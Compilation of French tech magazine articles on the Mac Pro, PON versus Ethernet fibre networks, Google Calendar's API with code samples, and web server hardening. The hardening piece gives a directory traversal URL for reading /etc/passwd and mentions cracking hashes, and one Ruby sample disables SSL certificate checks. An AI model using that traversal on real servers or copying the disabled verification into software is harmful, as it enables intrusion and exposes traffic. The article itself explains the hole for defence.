La transition vers les processeurs Intel s’est terminée avec l’annonce des Mac Pro et des nouveaux Xserve. Le Mac Pro embarque 2 processeurs Xeon 64-bit (jusqu’à 3 GHz) à double coeur. Ce qui améliorera notablement les performances. Comme sur les autres modèles, les processeurs ne sont pas soudés. Il est possible d’installer 4 disques durs et jusqu’à 16 Go de mémoire vive. Le design externe ne change pas. Par contre, l’aménagement intérieur a été revu pour faire tenir les baies à disque dur (avec installation facile) et les deux lecteurs / graveurs. Il se dote de l’USB 2, du FireWire 400 et 800, et de deux ports Ethernet 1 Gb. Si le Mac Pro est entièrement personnalisable dans sa configuration, Apple n’a pas introduit de modèle d’entrée de gamme mono processeur comme ce fut le cas pour le PowerMac G5 en son temps, dommage. Cependant, dans les stations haut de gamme, ce Mac Pro est tout à fait compétitif au niveau prix (environ 2 500 euros). Le PowerMac G5 reste au catalogue. D’autre part, Apple a introduit le Xserve Intel, doté du même processeur que le Mac Pro. Il demeure au format 1U. Il possède un bus frontal de 1,33 GHz par processeur et peut accueillir 32 Go de mémoire vive. Il propose l’alimentation redondante à chaud.




p.1
Réduire
PON face à Ethernet Actif pour les réseaux FTTH
Par Alain Baritault - Copyright L'INFORMATICIEN, tous droits réservés

À l’heure où les projets français de fibre à la maison commencent à émerger, l’architecture sous-jacente de ces réseaux prend de l’importance. Deux choix d’architecture s’offrent aux aménageurs de réseaux : l’architecture ouverte Ethernet Active et une architecture plus fermée appelée PON (Passive Optical Network), développée à l’initiative des opérateurs pour leur permettre d’offrir des services vidéo sur de la fibre de bout en bout à des coûts réduits. Le rapport efficacité/coût de ces deux architectures est l’objet de nombreux débats où l’utilisateur semble déjà un peu oublié.


Une nouvelle boucle locale

Le nouveau marché qui s’ouvre se trouve à la convergence de deux mondes, le monde de la téléphonie, représenté par les opérateurs dits « historiques », et le monde des réseaux, avec tous les constructeurs informatiques. Chacun de ces deux mondes cherche à en prendre un troisième en otage, le monde du contenu, essentiellement représenté par la télévision et le cinéma. L’arrivée de la fibre optique est pour chacun d’eux un enjeu primordial. Il consiste en effet à mettre en place et éventuellement prendre le contrôle d’une nouvelle boucle locale à très haut débit basée sur la fibre optique, venant se substituer à la boucle locale cuivre et compléter d’éventuelles boucles locales radio.
Chacun des mondes en présence fonctionne selon des modèles différents. Les opérateurs historiques vivent depuis longtemps dans les réseaux propriétaires. Le monde des constructeurs informatiques vit dans un monde plus ouvert et standard. Quant au monde du cinéma et des contenus, il s’appuie sur la loi qui le protège et sait que les réseaux sans contenu n’ont guère de valeur.
Viennent donc s’ajouter des contraintes de retour sur investissement, de couverture en zone urbaine ou rurale, de services et de concurrence. C’est avant tout au niveau des choix techniques initiaux que se jouent les premières escarmouches stratégiques pour la mise en place et le contrôle de ces nouvelles infrastructures. C’est pourquoi une analyse plus détaillée des architectures de réseaux de fibre optique permet déjà de mieux connaître les grandes orientations à venir.


Le principe du PON

C’est en 1995 que sont apparus les premiers réseaux PON standard, appelés ATM PON (APON). Ils ont depuis évolué sous différents noms. C’est un réseau point à multipoint, c’est-à-dire qu’il fonctionne comme les systèmes de diffusion d’un point central vers plusieurs abonnés. Il s’oppose à Active Ethernet dans la mesure où ce dernier est un réseau point à point, et où, comme dans le DSL, l’utilisateur a un lien direct et unique avec le commutateur central.
Comme son nom ne l’indique pas, le PON est un réseau actif, c’est-à-dire qu’il est basé sur de la fibre « allumée », mais celle-ci est allumée en majeure partie avec des composants passifs, ne nécessitant pas d’alimentation électrique. Il est programmé ou câblé une fois pour toutes pour permettre un contrôle centralisé du réseau et un minimum de maintenance sur place.
S’agissant d’une infrastructure de dernier kilomètre, nous regarderons les éléments placés entre le commutateur central et l’utilisateur final, l’abonné. Le commutateur est lui-même relié à une terminaison fibre à très haut débit (plusieurs Gigabits par seconde) ou à un système très haut débit ATM vers le réseau Internet. Le système débute par un Optical Line Terminator (OLT) proche du commutateur central. Il joue le rôle d’interface entre le commutateur, où arrivent tous les services, et le réseau de distribution de l’accès et des services vers les abonnés. Lorsque des données d’un service extérieur arrivent dans l’OLT, elles sont reconnues, triées et commutées activement vers un autre élément du réseau appelé séparateur. C’est un appareil passif dont le rôle est de décomposer et de partager une fibre en 32, 64, voire 128 fibres simples, qui vont chez autant d’utilisateurs finaux.
Chaque utilisateur reçoit un ONU (Optical Network Unit) à la maison qui est un boîtier terminal actif sur lequel viendront se connecter tous les appareils : télévision, PC, téléphone, DVD… Utilisant les services fournis par la fibre jusqu’à la maison.


La bande passante est partagée

Si l’on regarde une fibre au départ de l’OLT, les informations sont transportées par un rayon laser qui émet de la lumière jusqu’au séparateur. La lumière est alors partagée et émise vers tous les utilisateurs concernés, chacun recevant les morceaux d’information qui le concerne. Pour le retour d’information, l’ONU émet un signal laser sur une autre fréquence qui passe par la même fibre et retourne l’information qui est regroupée au niveau du séparateur. Elle est ensuite activement commutée au niveau de l’OLT vers les différents services concernés.

BasicPON.jpg
L’architecture du PON et ses différents composants.pon1.jpg
Le rôle du système PON qui utilise un mode de transmission TDM est essentiellement de commuter et de synchroniser les informations montantes et descendantes entre les OLT et les ONU. Chaque constructeur de PON développe de façon propriétaire la manière de gérer son réseau de manière à ce qu’il n’y ait pas d’interopérabilité entre les réseaux PON de plusieurs opérateurs.
Point très important des architectures PON : la bande passante qui arrive au niveau d’un séparateur sera toujours partagée pour un groupe de particuliers abonnés. Non seulement la bande passante est partagée dans le temps comme dans un commutateur téléphonique, mais aussi dans « l’espace » puisqu’il est possible d’ajouter de nouvelles longueurs d’onde pour transporter la lumière (au prix de modifications coûteuses des séparateurs et des OLT déjà installés).
Les dernières architectures PON, dont le GPON encore en cours de finalisation, permettent d’envoyer vers la maison un signal analogique sur une fréquence laser, ce qui permet de diffuser la télévision sur la fibre et de garder une autre fréquence laser pour les transactions de données avec Internet.
En descente donc, l’utilisateur peut recevoir théoriquement jusqu’à 100 Mbps (télévision et données réunies) et disposer d’une voie de retour partagée, lui accordant plusieurs Mbps, en fonction du nombre d’abonnés sur un séparateur.


Le PON enchaîne l’utilisateur à l’opérateur

En réalité, si par exemple le bouquet TV offert comporte 64 chaînes et que les 64 abonnés d’un même splitter regardent chacun une chaîne différente, il est possible que le réseau connaisse des difficultés « passagères ». De même, si les 64 abonnés d’un splitter décident en même temps de télécharger 64 films d’origines différentes au même moment, la bande passante disponible pour chacun sera nettement réduite.
Cette particularité est bien connue dans les réseaux câblés. Mais, compte tenu de la bande passante arrivant au séparateur (plus de 1 Gbps en général), l’amélioration est importante par rapport au DSL. Les réseaux PON sont prisés aux États-Unis, où ils sont installés dans des zones urbaines étendues, comportant une densité de population assez faible comparée aux villes européennes. Ils permettent de ramifier la fibre (le coût du génie civil représente 60 à 80 % du coût total du réseau), uniquement là où se trouvent des grappes d’habitations.
Un inconvénient des réseaux PON est que le réseau installé à la maison est lié à l’opérateur qui l’a installé. L’ONU dans chacun des foyers ne peut communiquer qu’avec le splitter de l’opérateur. Si l’utilisateur veut changer d’opérateur, il faut installer une autre fibre reliée à un autre séparateur, élément passif, qui ne connaît que l’OLT d’un seul opérateur. Cette solution n’est donc pas optimale du point de vue de l’utilisateur.

ffth.jpg
p.2
Réduire
L’alternative Ethernet

Longtemps ignorée par les opérateurs qui lui préféraient des architectures et des réseaux propriétaires mieux adaptés à la voix, Ethernet, grâce à sa grande flexibilité, la normalisation et l’interchangeabilité de ses équipements, ses performances continuellement enrichies et son faible coût des équipements, peut devenir l’architecture privilégiée pour le dernier kilomètre et les accès Internet à très haut débit.
C’est ce que certains appellent l’Ethernet de bout en bout, mais il lui a longtemps manqué un système de management élaboré permettant à l’opérateur de gérer des niveaux de services et d’allouer de la fréquence en fonction du type d’abonné et en fonction du service. Le 10 Gigabits Ethernet, ratifié en 2002 par l’IEEE, est aujourd’hui parfaitement opérationnel et l’IEEE a mis en place en février 2006 un groupe d’étude pour définir les caractéristiques d’une norme à 100 Gigabits/s pour la fin de la décennie. Ethernet est une architecture de réseau parfaitement adaptée à la convergence.


Les atouts de l’Ethernet point à point

Initialement réservé au câble coaxial, Ethernet ou 802.3 a été porté sur la paire torsadée et sur la fibre sous le nom de Gigabit Ethernet. Il est aujourd’hui commutable à très haute vitesse. Le premier intérêt d’un réseau point à point sous Ethernet est d’offrir beaucoup plus de bande passante (jusqu’à 1 Gigabit) à l’utilisateur. En effet, chaque utilisateur, comme dans le DSL, est relié par une fibre au commutateur central et peut bénéficier de la totalité de la bande passante y arrivant. Mais le premier kilomètre est un domaine entièrement nouveau pour Ethernet. Il peut y avoir complète différenciation entre le fournisseur des services et le fournisseur de l’accès Ethernet. L’un fournissant l’infrastructure de transport (Ethernet sur la fibre) et l’autre – ou les autres – fournissant les services, télévision, téléphonie, accès Internet…
Cette situation de mutualisation et d’ouverture de la boucle locale fibre est aujourd’hui un important sujet de discussion au sein des autorités de régulation européennes. Il était donc nécessaire de créer une nouvelle catégorie de système de management, système qui est complètement intégré dans les PON, mais rend les offreurs de services assez dépendants des opérateurs. C’était l’un des objectifs de l’initiative EFM que de faciliter le développement d’un système standard qui permette une gestion fine et sécurisée de cette séparation entre le transport et les services.

ffth2.jpg


Système de management dans Ethernet pour le dernier kilomètre

Cet élément, communément appelé OAM & P (Operational, Administation, Main-tenance and Provisionning) est un groupe de fonctions de gestion qui donne les indications de failles dans le système ou le réseau, surveille les performances, gère la sécurité, opère un ensemble de diagnostics en temps réel et permet la configuration et le « provisionnement » (la prise en compte par le système) des utilisateurs pour l’authentification et la facturation.
Un système appelé OMA a été incorporé en 2004 dans la version IEEE 802.ah d’Ethernet réalisée sous l’impulsion de l’EFM alliance. Elle devait rester transparente et compatible avec les caractéristiques existantes de Ethernet, sans modification des trames Ethernet ni changement de vitesse de circulation de l’information sur le réseau. Mais l’OAM intégré dans Ethernet n’est qu’un premier élément de cet OMA & P qui permet aux opérateurs de mettre en place un véritable SLA (Service Level Agreement). En outre, cet élément n’est encore qu’optionnel, c’est-à-dire que les fabricants d’équipements peuvent ne pas l’intégrer.

pon2.jpgArchitecture d’un réseau Ethernet en dernier kilomètre.


Pour qu’Ethernet devienne un véritable réseau de dernier kilomètre, il faut que tous les éléments dont il se compose, les routeurs, commutateurs et ONU (les terminaux chez l’utilisateur) puissent être reconnus par un OMA & P complet et standard. Plusieurs propositions permettant d’améliorer et de compléter le mécanisme OMA dans Ethernet sont en cours d’élaboration. D’ores et déjà, un OMA embarqué est en cours de développement pour être intégré dans les terminaux utilisateurs.
L’un des aspects essentiels d’Ethernet Point à Point est enfin la possibilité de met-tre en place des réseaux hybrides, fibre et cuivre, permettant aux opérateurs historiques de mettre à jour progressivement leurs réseaux existants, à moindre coût.


APON, BPON, EPON et GPON
Il y a plusieurs standards de PON, résultat de l’évolution de la technologie depuis 20 ans et des travaux du FSAN (Full Service Access Network), un consortium créé en 1995 par sept opérateurs sous le nom de Group 7. L’APON, le premier réseau PON standardisé, encapsulait les données transportées dans une trame ATM et ciblait essentiellement les entreprises. Il fut rapidement remplacé par le BPON (Broadband PON) qui est le PON le plus répandu aujourd’hui dans le monde. Il présente des caractéristiques techniques supérieures puisqu’il supporte le WDM (Wavelength Division Multiplexing) permettant de séparer les flux montants des flux descendants sur des fréquences laser différentes. Le BPON offre un débit maximum de 1,2 Gbit/s (622 Mbits/s en général) au splitter et permet dans certaines conditions de réseau hybride coax-fibre (HFC) de diffuser de la vidéo câblée dans une pseudo offre triple play. Il comporte aussi un système de sécurité plus élaboré. Un nouveau standard appelé EPON (Ethernet PON) est apparu du fait de la faiblesse des précédents pour la vidéo et de la télévision. En 2000, un groupe d’entreprises, dont Cisco et Intel, mettent en place une initiative appelée EFM (Ethernet for the Last Mile), dont l’objectif est de faire passer le protocole Ethernet comme un standard d’accès pour le dernier kilomètre. L’EPON a été développé et ratifié par l’IEEE en 2004 sous le nom IEEE 802.3 ah. Ce standard se propose de développer l’Ethernet dans la boucle locale sur une architecture de type PON et évite les problèmes de conversion entre les réseaux locaux, métropolitains et les grands réseaux IP. En continuité des travaux du FSAN est apparu le GPON, un nouveau standard en cours de ratification à l’ITU. Essentiellement porté par les opérateurs américains, le GPON est plus ouvertement basé sur l’IP, mais supporte aussi l’Ethernet en plus d’ATM. Il offre une bande passante plus importante pouvant aller jusqu’à 2,5 Gbits/s. Plusieurs constructeurs, dont Alcatel, ont choisi ce standard. Les premiers équipements GPON commencent à apparaître sur le marché.


p.1
Réduire
Un agenda de groupe à partager sur le Web
Par Noé Barat - Copyright L'INFORMATICIEN, tous droits réservés

Ce nouveau service signé Google est innovant, gratuit, rapide, intuitif et stable. Basé sur Ajax, il permet de partager et de publier des agendas publics ou semi-privés.

Comment partager un agenda avec son équipe de travail ? Voilà une bien épineuse question en entreprise, lorsque vos collègues ou collaborateurs utilisent des logiciels de messageries ou des systèmes d’exploitation différents. La solution ? Créer son calendrier et le partager via Internet pour pouvoir ensuite le synchroniser avec votre Mac, ou sous Windows avec Outlook, ou encore le triturer avec un plug-in Firefox… Avec Google Calendar, c’est possible (Calendar permet d’importer ou d’exporter des événements à partir d’Outlook, Yahoo! Calendar ou l’iCall d’Apple), mais ceci ne constitue pas vraiment une nouvelle excitante. Alors, s’agit-il d’un simple calendrier en ligne supplémentaire ? Non, car Google Calendar innove à plus d’un titre. Premièrement, vous avez la possibilité de créer plusieurs calendriers (personnel, professionnel…), et de voir chacun d’entre eux séparément, ou de les visionner l’un à côté de l’autre (affichable par couche avec des couleurs différentes). Deuxièmement, vous partagerez ainsi très simplement un calendrier avec d’autres personnes, tout en leur permettant de le mettre à jour s’ils en ont les droits. Troisième point : vous pourrez inviter d’autres personnes d’un simple clic. Enfin, vous pourrez générer un flux XML, ou ICAL, de manière à ce qu’une application tierce puisse facilement récupérer vos rendez-vous et/ou les mettre à jour !
L’idée de pouvoir ajouter des dates issues de calendriers publics est excellente. Exemple : vous voulez connaître la liste des matchs de la coupe de monde de football ? Il vous suffit de rechercher dans les calendriers publics de google les mots clés « coupe monde football », et ensuite d’ajouter le premier flux public relatif à ce sujet qui vous paraît le plus adéquat. Dans la même veine, il existe des calendriers publics notant les principales dates des tournois de tennis de l’ATP, ou encore la date de sortie des films dans les salles de cinéma, les principaux événements culturels d’une région, les fêtes de chaque pays, les fêtes de chaque religion, etc. Et pour ajouter un calendrier, il suffit de copier-coller son adresse dans le champ « Search public calendars » de son interface Google Calendar…


Consultez les disponibilités de votre médecin avec Google Calendar

Allons plus loin : Google Calendar est utilisable comme outil de gestion de rendez-vous chez un médecin. Le médecin utilise un agenda partagé et géré par lui-même, montrant les plages de rendez-vous encore disponibles. Pour y parvenir, le patricien remplira son agenda, avec ses rendez-vous, tout en y spécifiant si ce dernier est « Available » (disponible) ou « Busy » (zone horaire occupée). Puis, il partagera son agenda avec ses patients en sélectionnant « Share only my free / busy information (hide details) ». Le patient qui s’abonnera à cet agenda ne verra que l’information « plage de temps occupée » ou « libre ». Autrement dit, il ne pourra y visualiser le nom des patients qui ont déjà pris rendez-vous.

Google Calendar (GC) n’est pour le moment disponible qu’en anglais et repose sur la technologie Ajax (Asynchronous Javascript And Xml). En gros, celle-ci autorise un utilisateur à actualiser des données sans procéder au rechargement total de la page à chaque changement – techniquement l’objet Javascript XMLHttpRequest enverra une requête HTTP (POST, GET…) au serveur pour ensuite en récupérer le résultat. La conséquence directe est que l’on peut s’affranchir du rechargement d’une page pour récupérer une information sur le serveur. Bref, grâce à Ajax, l’impression de rapidité est bien réelle. Avec cette technique, vous pouvez ajouter un événement d’un simple clic à l’emplacement désiré, et vous pouvez faire glisser un rendez-vous d’un jour à l’autre avec une grande fluidité. La visualisation de l’agenda peut se faire par jour, pour les quatre prochains jours, pour la semaine ou pour le mois en cours. Évidemment, GC permet d’effectuer des recherches dans son propre agenda. Par défaut, l’agenda est privé, mais vous pouvez le rendre en partie « public » pour le partager avec d’autres utilisateurs. Mieux : GC est parfaitement intégré à gmail, quoique cette option n’est disponible pour l’instant que si vous avez effectué le choix de la langue anglaise dans les préférences. De cette manière, si vous recevez un rendez-vous par e-mail, vous pouvez l’ajouter rapidement sur votre calendrier – chaque événement sera alors affiché à droite du webmail sous la forme de liens.

Qu’en est-il de la vie privée ? Si Google s’engage à ce qu’aucun de ses employés ne lisent vos rendez-vous privés, on ne peut cependant par exclure que des robots, un jour, ne les parcourent en vue de proposer l’affichage de liens sponsorisés. Lorsque vous ajoutez un nouveau rendez-vous, où lorsque l’application a détecté un nouvel événement sur votre compte gmail, GC procède à une reconnaissance de mots-clés pour vous suggérer une entrée. Exemple tout bête : si vous entrez « meeting with team 2pm tomorrow in Paris », l’événement sera ajouté automatiquement à votre agenda (celui qui est actif). GC comprendra aussi que la localisation est Paris (une carte sera visible via le service Google Local).

Plus fort, vous pouvez créer un « snippet » permettant d’ajouter un événement sur une page HTML… Par exemple vous pourriez laisser sur une page Web une inscription pour une conférence qui renvoie directement sur Google Calendar.


Rappel de rendez-vous par SMS

En Amérique du Nord, GC permet d’envoyer des SMS de rappel des événements vers un téléphone portable. Mais vous pouvez utiliser une astuce pour réaliser la même chose dans nos pays francophones : il suffit d’utiliser la notification par e-mail en combinaison avec la redirection des messages par gmail – à condition que votre opérateur de téléphonie supporte les SMS/mails. Concrètement, cochez les cases EMAIL des événements qui vous intéressent (rendez-vous, nouvelles invitations, invitations modifiées ou annulées, emploi du temps de la journée) pour qu’un message soit envoyé à votre adresse gmail. Connectez-vous au webmail et créez ensuite un filtre de manière à réexpédier les notifications de GC vers l’adresse du mobile (l’expéditeur sera calendar-notification@google.com ). Enfin, dernière étape, encodez l’adresse mail qui correspond à votre numéro de portable et cliquez sur « Créer un filtre ». Avec cette technique, à chaque fois que GC générera un rappel, vous en serez notifié sur votre portable.


L’API GDATA : nous serons bientôt envahis par des mashups divers utilisant GC

Il y a fort à parier que, dans les mois à venir, d’innombrables outils utilisant GC vont voir le jour (et aussi des mashups (*) du web 2.0). En effet, peu de temps après la sortie de Google Calendar, Google a proposé une API permettant d’exploiter les données issues du calendrier en ligne. Cette API se nomme Gdata (« Google Data » ce qui n’est pas très original), et utilise la méthode REST, passant des paramètres dans l’URL, et utilisant les flux RSS et Atom (ce que l’on appelle « un service RSS bidirectionnel »). Par programmation, vous devrez d’abord vous authentifier. Et, si l’identification est positive, vous pouvez consulter, créer, modifier ou même effacer des événements dans le calendrier via cette API.

(*) Définition de mashup : une application composite dont le contenu est extrait d’un ou plusieurs sites Web.


Comment créer un snippet ?
Le but du jeu est de partager un événement sur votre blog ou site Web (ce snippet sera donc public). Si un visiteur clique sur ce snippet l’événement associé sera rapidement ajouté à son calendrier. En fait, en cliquant sur le snippet, un écran est affiché dans une fenêtre du navigateur présentant le détail de celui-ci. Et si le visiteur valide l’écran (en cliquant sur « ok »), le rendez-vous sera noté dans son agenda. Le code HTML sollicite une requête sur le serveur, via un mécanisme CGI qui prendra divers paramètres en entrée (le titre de l’événement, la date de départ, la date de fin et la localisation). Le détail des paramètres sera le suivant :
• paramètre « action » (obligatoire) : toujours de valeur TEMPLATE (en majuscule) ;
• paramètre « text » (obligatoire) : titre de l’événement ;
• paramètre « dates » (obligatoire) : date et heure (au format UTC) de début et de fin (chaque champ date devra se terminer par la lettre « Z » en majuscule) ;
• paramètre « sprop » (obligatoire) : identification de l’organisateur (site Web, nom de la société) ;
• paramètre « add » : adresse mail des personnes invitées (plusieurs paramètres add sont autorisés) ;
• paramètre « details » : description de l’événement (des balises simples HTML peuvent être insérées) ; • paramètre « location » : lieu ou l’événement prendra place ;
• paramètre « trp« : à true si « busy» .
Voici ce que cela pourrait donner comme snippet :
Google a prévu quelques images de tailles et de styles différents (« gc_buttonx » avec x variant de 1 à 5). Vous trouverez aux adresses ci-dessous des générateurs de bouton GC :
http://googlecalbutton.com/index.php
http://www.navaulakh.com/tools/google-calendar-event-maker/
http://deepak.jois.name/gcalevent/
http://stuff.rancidbacon.com/google-calendar/hack/


p.2
Réduire
Voici un code complet en java qui permet par programmation l’authentification (1), puis la lecture d’un flux XML (2) généré par GC, et enfin l’ajout (3) d’une entrée.

import com.google.gdata.client.*
import com.google.gdata.client.calendar.*
import com.google.gdata.data.*
import com.google.gdata.data.extensions.*
import com.google.gdata.util.*

import groovy.google.gdata.GDataCategory
import org.codehaus.groovy.runtime.TimeCategory

def myId = System.properties.id
def myPassword = System.properties.pass

// (2) Adresse privée du flux XML
def feedUrl = "http://www.google.com/calendar/feeds/$myId/private/full"

use (TimeCategory, GDataCategory) {
    def myService = new CalendarService ("codehausGroovy-groovyExampleApp-1")

// (1) Authentication
    myService.userCredentials = [myId, myPassword]
    myService.getFeed(feedUrl, 1.week.ago,     "
    4.weeks.from.today, 20). entries.each {entry ->
        entry.times.each {time ->
             println "${entry.title.text} From: ${time.startTime.toUiString()}     "
    To: ${(time.endTime.toUiString())}"
        }
    }
// (2) lecture
    myService.getFeed(feedUrl, 1.year.ago, 2.years, 20).entries.each {entry ->
        entry.times.each {time ->
            println "${entry.title.text} From: ${time.startTime.toUiString()}     "
    To: ${(time.endTime.toUiString())}"
        }
    }
// (3) ajout d’une entrée
    def me = new Person(name: "John Wilson", email: "tugwilson@gmail.com",     "
    uri: "http://eek.ook.org")
    def newEntry = new EventEntry(title1: "This is a test event", content1:     "
    "this is some content", author: me,
                                  time: new When(start: 1.hour.from.now, end:     "
    2.hours.from.now))

    myService.insert(feedUrl, newEntry)
}

D’autres langages sont possibles, comme le C# :

using Google.GData.Client;

FeedQuery query = new FeedQuery();
Service service = new Service("cl", "exampleCo-exampleApp-1"));
NetworkCredential nc = new NetworkCredential("jo@gmail.com", "mypassword");
// authentification
service.Credentials = nc;
// lecture
query.Uri = new Uri("http://www.google.com/calendar/feeds    "
    /jo@gmail.com/private/full");
AtomFeed calFeed = service.Query(query);


Ou encore le Ruby (quoique ce dernier ne soit pas officiellement supporté et passe par l’utilisation d’une bibliothèque tierce disponible sur http://rubyforge.org/projects/gcalendar/ ). Voici un extrait de code possible :

require ‘net/https’
require ‘uri’
#require ‘icalendar’
#require ‘atom’

user = "yourusername"       
password = "yourpassword"

class Hash
  def params(*args)
    out = []
    args.each do |key,default|
      out << (self[key.to_s] or self[key.to_sym] or default)
    end    
    return out
  end
end

# authentification
def google_login(user, password)
  url = URI.parse(‘https://www.google.com/accounts/ClientLogin’)
  data = "Email=#{user}&Passwd=#{password}&service=    "
    cl&source=PappySoft-GCal-1"
  headers = {‘content-type’ => ‘application/x-www-form-urlencoded’,
             ‘content-length’ => data.length.to_s
            }
  # On applique la requête
  https = Net::HTTP.new(url.host, url.port)
  https.use_ssl = true
  https.verify_mode = OpenSSL::SSL::VERIFY_NONE
  resp = https.post(url.path, data, headers)
  case resp
  when Net::HTTPOK
    auth = resp.body.split[2].split(‘=’)[1]
    return auth
  else
    return nil
  end
end
...



Conclusion

L’API gdata étant disponible dès maintenant, et à la portée de – presque – n’importe quel programmeur, on peut s’attendre à ce que Google Calendar fasse partie de nombreux services en ligne. Google Maps a connu la même vague de mash-ups : les cartes géographiques de Google ont par exemple été intégrées dans les annonces immobilières, et même dans les statistiques de criminalités… Le phénomène Ajax du Web 2.0 va d’ailleurs s’accélérer : les utilisateurs travailleront en ligne, communiquant et partageant des documents et des agendas ; rappelons au passage que le traitement de texte en ligneWritely a été racheté par Google : http://www2. writely.com/info/WritelyOverflowWelcome.htm .


Après son composeur de pages Web (http://pages.google.com/), et son bloc-notes Notebook se greffant à votre navigateur pour y copier-coller du texte, des images ou des hyperliens (http://www.google.com/notebook/download), Google propose son agenda partagé en ligne. Seule condition : lors de la première connexion, le serveur vous demande un nom d’utilisateur et un mot de passe gmail. Si vous n’avez pas encore de compte gmail, pas de panique. Comme nous l’avions déjà proposé il y a quelque temps, nous pouvons vous envoyer des invitations. Il suffit d’écrire à l’adresse noe.barat@linformaticien.fr.


Peu importe le système d’exploitation, du moment que Firefox continue son petit bout de chemin. Les géants de l’Internet vont ainsi s’accaparer sans vergogne notre temps et notre espace de stockage on-line (que l’on prédit illimité), le tout étant hébergé quelque part sur la planète, en Chine ou encore en Colombie, peu importe, du moment que cela reste accessible pour un coût négligeable… En Chine ? N’oublions pas non plus qu’en début d’année de nombreux internautes n’ont pas acceptés la censure sur google.cn, exigée par le gouvernement chinois. Exemple, de censure : la requête « tibet ». Des étudiants tibétains ont d’ailleurs manifesté à ce sujet devant le siège social de Google en Californie. Certains propriétaires de blogs ont pris l’initiative (isolée) de ne plus afficher d’annonces AdSense affirmant qu’ils ne toléraient pas « de travailler en collaboration avec une compagnie qui se plie si facilement aux exigences d’un État ». Paradoxalement, Google avait refusé de révéler des informations au gouvernement des États Unis. On n’arrête pas le « progrès »…



Un cas concrèt en entreprise avec les outils utilisés
La société BAYS est une entreprise applicatrice de peintures industrielles. Dans le cadre de son activité, il s’agit de faire partager un calendrier de production qui indique, par client, la date d’entrée et de sortie de pièces qui seront traitées dans son atelier. Le coordinateur utilise un portable sous Linux et les principaux intervenants travaillent soit sous Windows XP avec Outlook, soit sous Mac OS X. Le premier calendrier professionnel indiquera la date d’entrée des pièces par lot, et le deuxième la date souhaitée de sortie. Si un intervenant ne fait que consulter le planning, le plus simple est de demander à GC l’adresse privée de son flux ICAL. Il faut d’abord sélectionner le calendrier puis demander d’afficher ses « settings ». Dans l’onglet « details », cliquez sur le bouton ICAL de la ligne « Private Address ». Ce qui vous donnera quelque chose du genre :
 http://www.google.com/calendar/ical/d9buuiyufr6c9q8bvn2nb0qink@group.calendar.google.com/private-5f1812abcdef26ee0c19c23c86a8bc7a/basic.

Ensuite, avec par exemple une autre application Ajax en ligne, telle que netvibes (http://www.netvibes.com/), il suffit d’ajouter un lecteur de flux ICAL pour que, sous Firefox, vous puissiez lire chaque événement. Les utilisateurs sous Outlook peuvent exporter une partie de leur agenda au format CVS pour que l’on puisse le consulter publiquement sous GC. Concrètement, il suffit d’ouvrir Outlook, et d’exporter le fichier CVS correspondant au calendrier via Fichier/Exportation – au format Comma Separated Values (CSV) ; mais attention, pour l’instant vous devrez exporter en indiquant temporairement l’anglais dans les « options régionales » du panneau de configuration de Windows (*). Puis sous GC, choisir le lien Settings / Import Calendar. Maintenant, il est aussi possible de synchroniser à la volée avec le projet remotecalendars (http://remotecalendars.sourceforge.net/google.htm). À ce propos, Madame Van Calck, de la société BAYS, travaillant avec l’outil Microsoft, nous déclare : « Au début, je ne croyais pas trop en l’idée de partager des agendas on-line. En fait, comme je travaille essentiellement sous Outlook 2003, je ne voulais pas abonner mon outil préféré auquel je suis habitué pour quelque chose de plus contraignant. Heureusement, l’informaticien de la maison a rapidement installé un supplément logiciel capable de réaliser facilement cette synchro ; et jusqu’à aujourd’hui, tout fonctionne au mieux, sans avoir changé mes habitudes. On peut facilement synchroniser nos divers agendas entre les différents sièges du groupe sans avoir d’intranet commun : nous passons simplement par Internet avec Google Calendar. »

(*) ou bien vous devrez remplacer la première ligne du CSV exporté par outlook par « Subject », « Start Date », « Start Time », « End Date », « End Time », « End Time », « Private ». Ceux qui sont sous Mac OS X utilisent le navigateur camino (http://www.caminobrowser.org/), et iCal après avoir récolté l’adresse privée ou publique du flux ICAL sous GC. La synchronisation est possible avec un iPod (http://spongecell.com/info/ipod_sync). Sous Thunderbird, il existe l’extension « Thunderbird Lightning Extension » qui permet également de récupérer le flux ICAL (New/Remote puis « WebDAV » comme location distante en collant l’adresse ICAL récoltée sous GC).
Mais le plus pratique pour les intervenants est sans doute d’utiliser une des extensions Firefox, dont voici une courte liste :
• Google Calendar Notifier : https://addons.mozilla.org/firefox/2528/
• GcalQuickTab : https://addons.mozilla.org/firefox/2372/
• Google Calendar Quick Add : https://addons.mozilla.org/firefox/2405/


p.1
Réduire
Protégez votre serveur Web des hackers !
Par Yann Serra - copyright L'INFORMATICIEN, tous droits réservés

La sécurité d’un serveur Web dépasse le cadre fonctionnel d’un routeur/firewall. Elle suppose la mise en place de verrous aux niveaux de la configuration, de l’interprétation des requêtes et des éléments délivrés.


La sécurité de votre serveur Web commence par la dissociation des informations que vous souhaitez publier et celles présentes sur la machine, mais qui n’ont pas à apparaître sur votre site Web. De manière radicale, il s’agit de placer votre site Web sur une partition à part si vous le faites fonctionner sur Windows. Si votre serveur tourne sur un système Unix (typiquement Linux), la chose est plus délicate car son processus maître sera exécuté sous l’égide du super utilisateur, et aura en ce sens accès à l’intégralité de vos disques. Il convient donc de créer un compte dont les droits se restreignent aux répertoires de votre site Web et qui servira à exécuter les instances du serveur. Ces instances sont celles qui répondent aux requêtes de vos visiteurs. Dans Apache (pour citer le plus connu des serveurs Web), on attribue la tutelle des instances à un compte particulier en définissant les directives “ user ” et “ group ” au sein du fichier “ httpd.conf ”.


OWASP, la bible de la protection Web
La bible de la sécurité des serveurs Web existe. Il s’agit du guide que publie régulièrement l’OWASP (Open Web Application Security Project), une organisation sans but lucratif et reconnue d’utilité publique par de nombreux gouvernements de la Planète. Ce guide de près de 300 pages peut se télécharger gratuitement au format PDF (imprimable) depuis l’adresse http://prdownloads.sourceforge.net/owasp/OWASPGuide2.0.1.pdf?download. Cette formidable mine d’information présente juste le défaut de n’être qu’en anglais.




Une passerelle vers tout votre disque dur

Si vous ne le faites pas, vous vous exposez à une faille que l’on appelle “ directory traversal ” et qui consiste, pour un pirate, à naviguer sur votre disque dur en manipulant les URL que vous proposez. Typiquement, cette faille permet de remonter à la racine du disque dur et, de là, de se balader dans les répertoires à la recherche des fichiers critiques de votre système d’exploitation. Par exemple, si le serveur Web du site www.monsite.com tourne sous Linux depuis le répertoire /home/site/www/, l’URL suivante permettra de télécharger le fichier contenant les mots de passe de tous les utilisateurs référencés sur la machine hôte (ils sont cryptés, mais se déchiffrent plus ou moins facilement avec des outils du style John The Ripper) :

http://www.monsite.com/../../../etc/passwd

